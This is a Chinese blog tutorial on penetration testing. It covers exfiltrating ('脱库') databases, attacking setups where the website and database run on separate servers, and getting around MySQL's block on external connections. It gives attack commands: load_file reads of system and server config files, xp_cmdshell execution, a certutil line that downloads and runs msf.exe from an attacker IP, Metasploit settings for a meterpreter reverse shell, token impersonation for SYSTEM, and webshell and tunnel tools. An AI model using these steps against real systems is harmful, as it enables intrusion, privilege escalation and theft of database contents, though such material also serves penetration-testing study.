脱库&站库分离渗透&解决MySQL禁止外连

已于 2022-05-13 11:11:32 修改
阅读量1.3w 收藏 18
点赞数 8
分类专栏: # 内网&提权&红蓝对抗 文章标签: windows server 提权 数据库 MySQL web开发
于 2021-11-22 21:33:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q20010619/article/details/121481186
版权


文章目录

打包数据库文件

  1. access 数据库:mdb格式直接下载

  2. MySQL数据库:在路径mysql/data/下存放所有数据库,直接将文件夹复制到web目录tar打包下载

    image-20211122203800161

  3. mssql数据库:msdbdata.mdf msdblog.ldf 两个文件复制,直接下载

SQL语句打包数据库

MySQL

登录数据库,命令备份数据库

  • mysqldump -u db_user -p db_passwd db_name > 1.sql //备份指定数据库

  • cd /var/lib/mysql

    mysqldump -u db_user -p db_passwd > 1.sql //先进入数据库目录再备份

  • mysqldump --all-databases > 1.sql //备份所有数据库

数据库还原

  • mysql -u db_user -p db_passwd db_name < 1.sql //还原指定数据库

  • cd /var/lib/mysql

    mysql -u db_user db_passwd < 1.sql //先进入数据库目录再还原

mysqldump 命令不仅可以在数据中使用,有权限的话也可以在命令行中使用

SQL server

登录数据库

backup database Test to disk='D:/Test.bak'

使用工具打包数据库

如果在知道数据库账密的情况下可以使用这种方式,存在web端数据管理直接用

mysql

  • adminer
  • phpmyadmin
  • navformysql

mssql

  • navfor for sql server

navicat 也是可以的

以及webshell管理工具如蚁剑、菜刀等都有数据管理功能

站库分离渗透

注:此部分转载于潇湘信安

站库分离其实就是管理员将网站程序和数据库分别放在了不同的服务器上,这样看似提高了数据安全性,但是如果网站存在漏洞,攻击者还是有可能以Web或Data为入口访问到内网数据库服务器中的数据

Web入口渗透

通过网站的各种漏洞来Getshell,如:文件上传、文件包含、命令执行、代码执行、SQL注入写入一句话(Into outfile、日志备份)等,在获得Webshell权限或者有诸如文件读取等漏洞时,我们可以读数据库配置文件、对数据库内容分析、查找数据库备份,进而对内网数据库服务器进行渗透

Data入口渗透

从数据库入口渗透同样是为了获取更大的权限,或者扩展我们的渗透成果。比如从这台数据库服务器中可以得到网站和数据库的一些用户、密码等信息,在后续的内网渗透中可以很有效的帮助我们

通过外网暴露的数据库弱口令、反编译或嗅探C/S客户端以及Web网站SQL注入漏洞等,在获得数据库账户密码或者利用sqlmap进入到os-shell、sql-shell,这时我们不能写入Webshel,因为这台数据库服务器中没有Web环境,但可以通过以下方式来做信息搜集和获取权限,先拿到这台数据库服务器权限,然后再尝试对Web服务器和内网其他主机进行渗透

站库分离判断方法

1.网络连接状态

通过Netstat命令查看MSSQL数据库1433端口的网络连接状态,可以看到与当前MSSQL数据库服务器192.168.32.8建立连接的只有192.168.32.3,由此可以判断这台主机为Web服务器

netstat -ano | findstr "1433"

站库分离常规渗透思路总结

2.数据库配置文件

通过网站程序数据库配置文件来判断是否站库分离,如果数据库IP地址是localhost、127.0.0.1或当前主机内网IP则说明为同服务器,反之则可能为站库分离,自建公网数据库和RDS云数据库除外

3.MySQL内置函数和库

通过MySQL的@@hostname内置函数可以查看服务端主机名称,information_schema内置库的PROCESSLIST可以定位到当前已连接数据库的用户名、主机和端口号等信息,Windows连接格式:主机名:Port,Linux连接格式:IP:Port,本地连接格式:localhost:Port

select @@hostname;                                 //服务端主机名称
select * from information_schema.PROCESSLIST;      //客户端主机名称和端口

站库分离常规渗透思路总结

也可以通过load_file()这个内置函数读取一些敏感文件,如:hosts文件中解析的一些内网业务的IP地址和域名,IIS/Apache/Nginx/Tomcat/Jboss/Weblogic/Websphere的相关配置文件以及网卡信息等

select load_file('C:/Windows/System32/drivers/etc/hosts');

/etc/hosts
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/udev/rules.d/70-persistent-net.rules          //获取网卡名称
/etc/network/interfaces                            //DHCP或静态IP
/var/lib/dhclient/dhclient--网卡.lease             //DHCP
/etc/sysconfig/network-scripts/ifcfg-网卡          //静态IP
C:/Windows/System32/drivers/etc/hosts
C:/Windows/system32/inetsrv/MetaBase.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/phpStudy/Apache/conf/httpd.conf
C:/phpStudy/Apache/conf/vhosts.conf
C:/phpStudy/PHPTutorial/Apache/conf/httpd.conf
C:/phpStudy/PHPTutorial/Apache/conf/vhosts.conf
C:/phpStudy/PHPTutorial/nginx/conf/nginx.conf
C:/phpStudy/PHPTutorial/nginx/conf/vhosts.conf
[...SNIP...]

4.MSSQL内置函数和表

通过MSSQL的host_name()、@@servername和serverproperty几个内置函数来判断是否站库分离,如果客户端与服务端返回的主机名不一样则说明为站库分离,返回的主机名一样则说明可能为同服务器

select host_name();                       //客户端主机名称
select @@servername;                      //服务端主机名称
select serverproperty('MachineName');     //服务端主机名称

也可以通过MSSQL的sysprocesses系统表来判断是否站库分离,它的功能类似于MySQL中的PROCESSLIST,可以定位到当前已连接到sqlinject数据库的用户名和主机名等信息

有时会有内网多台Web服务器同时连接一台数据库服务器中的不同数据库,这时我们就可以利用这种方式来查看连接到某数据库的用户名和主机名等信息,然后使用Ping主机名得到这台Web服务器的内网IP地址

select name from master.sys.sysdatabases;
select * from master.sys.sysprocesses where dbid= db_id('sqlinject');
exec master..xp_cmdshell 'cmd /c ping WIN-111111111';

还可以直接通过以下MSSQL注入语句来判断是否站库分离,news必须为数据库中存在的表名,当然用其他存在的表名也是可以的,如果注入页面返回不正常则说明为站库分离,反之则为同服务器

and exists(select * from news where 1=(SELECT (case when host_name()=@@servername then 1 else 0 end)))

站库分离常规渗透思路总结

站库分离利用思路

1.下载远程文件

目标主机允许通外网时我们可以利用Vbs/Ftp/IPC$/Certutil/Bitsadmin/Powershell等方式来下载远程文件到可读写目录中,然后再去执行一下即可

certutil -urlcache -split -f http://155.**.***.229:8888/msf.exe C:ProgramDatamsf.exe
C:ProgramDatamsf.exe

站库分离常规渗透思路总结

2.执行远程Payload

目标主机允许通外网时我们可以直接利用Metasploit下的exploit/multi/script/web_delivery和exploit/windows/misc/hta_server两个模块来执行远程Payload获取会话,比第一种方法更简单快捷

set target 1
set payload windows/x64/meterpreter/reverse_tcp
set lhost 155.**.***.229
set lport 443
exploit

3.模拟令牌权限提升

笔者曾经在几个这样的“MSSQL站库分离”实战环境中直接通过Incognito扩展中的模拟令牌功能获取到数据库服务器的Admin/SYSTEM令牌

在本地“站库分离”靶场环境中测试发现,只要有主机在使用Windows身份验证连接到这台数据库服务器的MSSQL时就会保留当前登录用户的令牌,而大多数人又都是以默认Administrator管理员来安装的MSSQL,所以能够直接获取到Administrator令牌

支持Windows身份验证的数据库连接工具有:sqlcmd、SSMS和Navicat Premium等

C:Program FilesMicrosoft SQL Server100ToolsBinnsqlcmd.exe -S "192.168.1.109" -E

站库分离常规渗透思路总结

推荐阅读

  • https://xz.aliyun.com/t/8584

站库分离打包数据库

  • MySQL

    站库分离情况下,MySQL数据库是一定支持外部访问的

    使用webshell管理工具如蚁剑、菜刀等都有数据管理功能,以及使用数据库管理工具打包

  • SQL server

    使用webshell管理工具如蚁剑、菜刀等都有数据管理功能

解决MySQL禁止外连

蚁剑

在地址上右击选择数据操作

image-20211120213356143

点击左侧工具栏的添加按钮,连接字符串就是index.aspx文件泄露的

image-20211120213330489

Navicat tunnel隧道

目标 MySQL 不允许外连,但是可以上传 PHP 脚本:

img

这个时候可以使用 Navicat 自带的 tunnel 隧道脚本上传到目标网站上:

img

实际上 Navicat 很久很久以前就自带这些脚本了,这个脚本有点类似于 reGeorg,只是官方的脚本用起来更舒服方便一点,脚本的界面如下:

如下:

img

接着连接的时候设置 HTTP 通道:

img

这个时候主机地址填写 localhost 即可:

img

OceanSec
关注
  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
脱库了解一下
10-14
适用于小白,和开发人员了解的网络安全知识,防sql注入风险。
mysql大数据分库和分表 php解决方案
07-08
本文讲的是mysql大数据分库和分表 php解决方案。 mysql分库分表方案、mysql 分库方案、php实现mysql分库分表、mysql高并发解决方案。
获取webshell的十种方法
最新发布
2301_76786857的博客
03-07 1188
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。
dev c++ 连接 mysql 方法、库
05-09
教你如何使用devc++ 连接mysql数据库 内含所需头文件以及mysql的库 教你如何使用devc++ 连接mysql数据库 内含所需头文件以及mysql的库
mysql主从库不同步问题解决方法
12-15
遇到这样的错误如:“Last_IO_Error: Got fatal error 1236 from master when reading data from binary log: ‘Could not find first log file name in binary log index file’”等或由于清数据导致主从库不同步了,解决办法如下: 先进入slave中执行:”slave stop;”来停止从库同步; 再去master中执行:”flush logs;”来清空日志; 然后在master中执行:”show master status;”查看下主库的状态,主要是日志的文件和po
基于Mycat实现Mysql读写分离以及分库分表.doc
09-22
内容详细,亲测可用,包含图文介绍
撞库、脱库和洗库
GMaya的博客
04-24 9226
撞库 “撞库”一般就是指黑客拿到已经泄露的用户信息,然后去各个网站进行登录,一旦你的账号密码在各个网站都一样,那么就相当于撞库成功。 建议:各个网站的登录账号和密码不要一样。 脱库 “拖库”就是黑客通过技术手段,盗取数据库信息的过程。 建议:做防sql注入,文件上传漏洞等。 洗库 “洗库”就是将得到的数据信息进行贩卖。变现。 ...
脱壳八大法
z1103758的博客
03-29 4385
ESP定律 1.OD载入 2.F8寄存器窗口找到红色ESP 3.右键数据窗口跟随 4.选中数据硬件访问 5.F8到OEP,从模块中删除分析 6.F8右键 用OllyDump脱壳 单步跟踪法 1.OD载入 2.F8到有跳空运行记录下来,重运行F8到跳空的地方F7 3.F8到有向上执行的,选择向上执行的代码的下一行F4 4.F8到OEP 5.用OllyDump脱壳 两次断点法(内存镜像法) 1.OD...
脱库和删库的实践及解决方案
深耕安全技术研究
02-03 4909
文章目录1.定义2.影响3.解决方案4.结论 1.定义 脱库:它属于来自外部恶意攻击。 删库:它属于是来自内部开发或运维人员的bug。 2.影响 但是在项目的业务是十分复杂,在一些紧急情况下还是很难避免需要直接操作数据库进行调试。 只要时间跨度足够长,运维及开发人员操作数据库就肯出现疏忽的很大可能性。 而且在我们开发项目的业务中还会出现各种各样的可能,包括活动漏洞数值漏洞等等,导致需要回档的运营事故并不罕见。 3.解决方案 就是生产环境的数据库不允许直接操作,不提供和不使用任何数据库管理工具或者命令行工具。
系统脱库与多级缓存
梦里蓝天
01-10 1516
1. 组件设定缓存过期时间 public List queryorder(order vo) if(缓存为空){ list= queryByCache(vo);//从数据库中读取数据 } return list; } 2. 代码设定缓存逻辑过期,可脱库运行 方法是利用时间戳,査询默认以 缓存数据为主,每次设置数据的时候放入一个时间戳,每次读取数据的时候用系统当前时间和上次设置的这个时间...
mysql脱库_php+mysql注入拿webshell到脱库
weixin_29103027的博客
01-19 544
注:此文章献给那些还对注入不怎么理解的人学习!本次实站过程已经过去一个月了,但是还是写出这个文章,来跟大家分享一下希望大家都能喜欢,就算这次大家再找到此战漏洞也别破坏,毕竟我们只是学习一下!目标站:http://www.XXXteam.cn/注入点:http://www.XXXteam.cn/newmess.php?id=138找到注入点后猜字段,可用 order by 1 猜解,order by...
打开脱裤后的数据库文件
08-14
打开脱裤后的数据库文件,打开之前尽量先了解什么格式
mysql-connector-java java连接mysql
11-16
mysql-connector-java-bin-jar,java连接mysql库,适用java8
(转载)你的个人信息是如何被盗走的?MySQL脱库脱库的原理,怎么脱库脱库的步骤,一库三表六字段
moose_killer的博客
02-26 5147
一、什么是脱库脱库」是指,利用网站的漏洞,获取数据库中的全部用户信息。 比如某银行数据泄露,泄露的信息包括名字、性别、卡号、身份证号、手机号码 、所在城市、联系地址、工作单位、邮编 、工作电话、住宅电话、卡种、发卡行等等。 我们平时接到的诈骗电话,对方知晓我们所有的个人信息,他们的信息来源可能就是某网站的数据泄露;当然,并不是所有的诈骗电话都是源于数据泄露,比如 我……秦始皇……打钱! 脱库有一个前提,那就是网站存在SQL注入漏洞。 我们举个栗子,你暗恋你们校花很久了,这天,你发现你们学校官网存
脱库咋办?KMS 给你解决方案!
Authing的博客
11-20 2070
最近经常能听见某某某公司用户信息被泄漏了,某某某公司用户开房记录被脱裤了 … 数据隐私是企业的生命线,其重要性我想无需我多说什么。 上一篇文章我们科普了一下 AWS KMS 服务: AWS KMS 科普: What Why and How? 简要回顾一下:KMS 全称为 Key Management Service,也就是一个密钥管理系统,它在设计上从根本解决了数据的安全性问题,同时还具备完整的安全审计功能,能让我对谁能够访问我的数据、谁什么时候动了我的数据一目了然。 借助 KMS 的帮助,我们能够做到,即
mysql脱库_mysql 脱裤(脱库)通用脚本
weixin_34638776的博客
01-28 2260
TK:全面解密脱裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:[email protected] #_Author:HYrz--------------------------------------------------------Start M...
脱库、撞库和洗库
answer3lin的博客
09-13 8348
拖库:本来是数据库领域的专用语,指从数据库中导出数据。而现在它被用来指网站遭到入侵后,黑客窃取数据库的行为。也就是网站被入侵以后数据库信息泄露了。 撞库:使用大量的一个网站的账号密码,去另一个网站尝试登陆。也就是基于用户代码重复度比较高的问题,使用被脱库的密码尝试其它网站。 洗库:黑客入侵网站在取得大量的用户数据之后,通过一系列的技术手段和黑色产业链将有价值的用户数据变现。类似于XQ。 社工库:黑客将获取的各种数据库关联起来,对用户进行全方位画像。AW里有收费的各种库,实际上是收集的用户的信息进行集合
SQLMAP 脱库过程(post请求,三种方法)
qq_41092600的博客
02-12 5002
一、准备工作 1、sqlmap为python语言开发,因此需要具备python环境。 2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过) 二、环境搭建 1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA 2、以DVMA的sql注入为例(DVMA安全级别为medium),进行详细介绍。 三、post请求脱库(...
撞库、脱库和洗库是什么意思
Alone的博客
03-24 8103
mysql误删库怎么解决
05-15
如果你误删了 MySQL 数据库,可以尝试使用以下方法进行修复: 1. 使用备份恢复数据:如果你有备份,可以将备份数据导入到 MySQL 数据库中,以恢复误删的数据。 2. 使用 MySQL 日志恢复数据:如果你启用了 MySQL 的二进制日志功能,可以通过回放日志的方式恢复误删的数据。 3. 使用 MySQL 数据恢复工具:MySQL 提供了一些数据恢复工具,例如 mysqlbinlog、mysqlbinlog、myisamchk 等,可以用来修复误删的数据库。 4. 寻求专业的数据恢复服务:如果以上方法都无法解决问题,可以寻求专业的数据恢复服务,他们通常能够使用更高级的技术来恢复数据。 无论使用哪种方法,恢复误删的 MySQL 数据库都需要谨慎处理,避免造成更大的损失。建议在操作之前备份好数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OceanSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值